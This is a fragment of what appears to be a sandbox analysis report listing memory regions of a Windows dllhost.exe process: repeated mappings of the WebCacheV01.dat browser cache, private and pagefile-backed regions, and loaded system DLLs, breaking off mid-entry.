name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 925 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 926 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 927 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 928 start_va = 0x6e0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 929 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 930 start_va = 0x8e0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 931 start_va = 0x8f0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 932 start_va = 0x900000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 933 start_va = 0x910000 end_va = 0x91ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 934 start_va = 0x920000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 935 start_va = 0x930000 end_va = 0x93ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 936 start_va = 0x940000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 937 start_va = 0x950000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 938 start_va = 0x960000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 939 start_va = 0x970000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 940 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 941 start_va = 0x990000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 942 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 943 start_va = 0x9b0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 944 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 945 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 946 start_va = 0x9e0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 947 start_va = 0xae0000 end_va = 0xc67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 948 start_va = 0xc70000 end_va = 0xdf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c70000" filename = "" Region: id = 949 start_va = 0xe00000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 950 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 951 start_va = 0x2300000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 952 start_va = 0x2310000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 953 start_va = 0x2330000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 954 start_va = 0x2400000 end_va = 0x2736fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 955 start_va = 0x2740000 end_va = 0x274ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002740000" filename = "" Region: id = 956 start_va = 0x2750000 end_va = 0x275ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002750000" filename = "" Region: id = 957 start_va = 0x2760000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002760000" filename = "" Region: id = 958 start_va = 0x2770000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002770000" filename = "" Region: id = 959 start_va = 0x2780000 end_va = 0x278ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002780000" filename = "" Region: id = 960 start_va = 0x2790000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002790000" filename = "" Region: id = 961 start_va = 0x27a0000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 962 start_va = 0x27b0000 end_va = 0x27bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027b0000" filename = "" Region: id = 963 start_va = 0x27c0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027c0000" filename = "" Region: id = 964 start_va = 0x27d0000 end_va = 0x27dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027d0000" filename = "" Region: id = 965 start_va = 0x27e0000 end_va = 0x27effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027e0000" filename = "" Region: id = 966 start_va = 0x27f0000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027f0000" filename = "" Region: id = 967 start_va = 0x2800000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 968 start_va = 0x3800000 end_va = 0x3800fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 969 start_va = 0x3810000 end_va = 0x3810fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003810000" filename = "" Region: id = 970 start_va = 0x3820000 end_va = 0x3823fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 971 start_va = 0x3830000 end_va = 0x3831fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 972 start_va = 0x3840000 end_va = 0x3840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003840000" filename = "" Region: id = 973 start_va = 0x3850000 end_va = 0x38dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003850000" filename = "" Region: id = 974 start_va = 0x38e0000 end_va = 0x38e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038e0000" filename = "" Region: id = 975 start_va = 0x38f0000 end_va = 0x38f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038f0000" filename = "" Region: id = 976 start_va = 0x3920000 end_va = 0x392ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 977 start_va = 0x3950000 end_va = 0x395ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 978 start_va = 0x3960000 end_va = 0x396ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 979 start_va = 0x3970000 end_va = 0x397ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 980 start_va = 0x3980000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 981 start_va = 0x3990000 end_va = 0x399ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 982 start_va = 0x39d0000 end_va = 0x39dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 983 start_va = 0x39e0000 end_va = 0x39effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 984 start_va = 0x3a00000 end_va = 0x3a07fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 985 start_va = 0x3a10000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 986 start_va = 0x3a30000 end_va = 0x3a3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 987 start_va = 0x3a40000 end_va = 0x3a4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 988 start_va = 0x3a50000 end_va = 0x3a57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 989 start_va = 0x3a60000 end_va = 0x3a6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 990 start_va = 0x3a80000 end_va = 0x3a8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a80000" filename = "" Region: id = 991 start_va = 0x3ac0000 end_va = 0x3acffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 992 start_va = 0x3ad0000 end_va = 0x3adffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 993 start_va = 0x3ae0000 end_va = 0x3aeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 994 start_va = 0x3af0000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 995 start_va = 0x3b00000 end_va = 0x3b0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 996 start_va = 0x3b10000 end_va = 0x3b1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b10000" filename = "" Region: id = 997 start_va = 0x3b20000 end_va = 0x3b2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 998 start_va = 0x3b30000 end_va = 0x3b3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 999 start_va = 0x3b40000 end_va = 0x3b4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1000 start_va = 0x3b50000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 1001 start_va = 0x3c50000 end_va = 0x3c5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c50000" filename = "" Region: id = 1002 start_va = 0x3c60000 end_va = 0x3c6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1003 start_va = 0x3c70000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1004 start_va = 0x3c80000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 1005 start_va = 0x3d80000 end_va = 0x3e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 1006 start_va = 0x3e80000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 1007 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1008 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1009 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1010 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1011 start_va = 0x7ff685100000 end_va = 0x7ff685106fff monitored = 0 entry_point = 0x7ff685101570 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 1012 start_va = 0x7ffd3e2b0000 end_va = 0x7ffd3e2c4fff monitored = 0 entry_point = 0x7ffd3e2b5740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 1013 start_va = 0x7ffd40d60000 end_va = 0x7ffd41058fff monitored = 0 entry_point = 0x7ffd40e27280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1014 start_va = 0x7ffd41ae0000 end_va = 0x7ffd41d6dfff monitored = 0 entry_point = 0x7ffd41bb0f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1015 start_va = 0x7ffd47080000 end_va = 0x7ffd47401fff monitored = 0 entry_point = 0x7ffd470d1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1016 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1017 start_va = 0x7ffd4bfe0000 end_va = 0x7ffd4c010fff monitored = 0 entry_point = 0x7ffd4bfe7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1018 start_va = 0x7ffd4c250000 end_va = 0x7ffd4c26efff monitored = 0 entry_point = 0x7ffd4c255d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1019 start_va = 0x7ffd4c590000 end_va = 0x7ffd4c59afff monitored = 0 entry_point = 0x7ffd4c5919a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1020 start_va = 0x7ffd4c980000 end_va = 0x7ffd4c9a8fff monitored = 0 entry_point = 0x7ffd4c994530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1021 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1022 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1023 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1024 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1025 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1026 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1027 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1028 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1029 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1030 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1031 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1032 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1033 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1034 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff 